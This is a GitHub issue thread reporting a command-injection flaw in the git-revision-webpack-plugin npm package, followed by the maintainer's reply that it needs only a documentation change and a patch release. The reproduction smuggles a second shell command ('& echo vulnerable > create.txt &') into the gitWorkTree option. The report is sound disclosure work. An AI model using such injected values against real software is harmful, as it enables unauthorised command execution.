pirelenito / git-revision-webpack-plugin

🏗 Webpack plugin that generates VERSION and COMMITHASH files during build
https://www.npmjs.com/package/git-revision-webpack-plugin
MIT License

huntr.dev - Command Injection #49

Closed huntr-helper closed 4 years ago

huntr-helper commented 4 years ago

Vulnerability Description

The function commithash within lib/helpers/run-git-command.js takes user input, which is passed to the gitCommand argument without any sanitization.

Steps To Reproduce:

var Root = require("git-revision-webpack-plugin");
var opt = {
  "gitWorkTree": "& echo vulnerable > create.txt &"
};
var root = new Root(opt);
root.commithash();

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

pirelenito commented 4 years ago

Got in touch with npm regarding this report and we've agreed that this is not an issue:

We agree with your assessment and agree that only very unusual usage of the package would lead to an exploitable scenario.

I've updated the package documentation to state that it should not "accept arbitrary user input": c09f1131f2308c6b4cf2efb1d9d608d245dd6f37 and released a new patch: https://github.com/pirelenito/git-revision-webpack-plugin/releases/tag/v3.0.5

JamieSlome commented 4 years ago

@pirelenito - thanks for clarifying with NPM and the new release! 🍰 🎉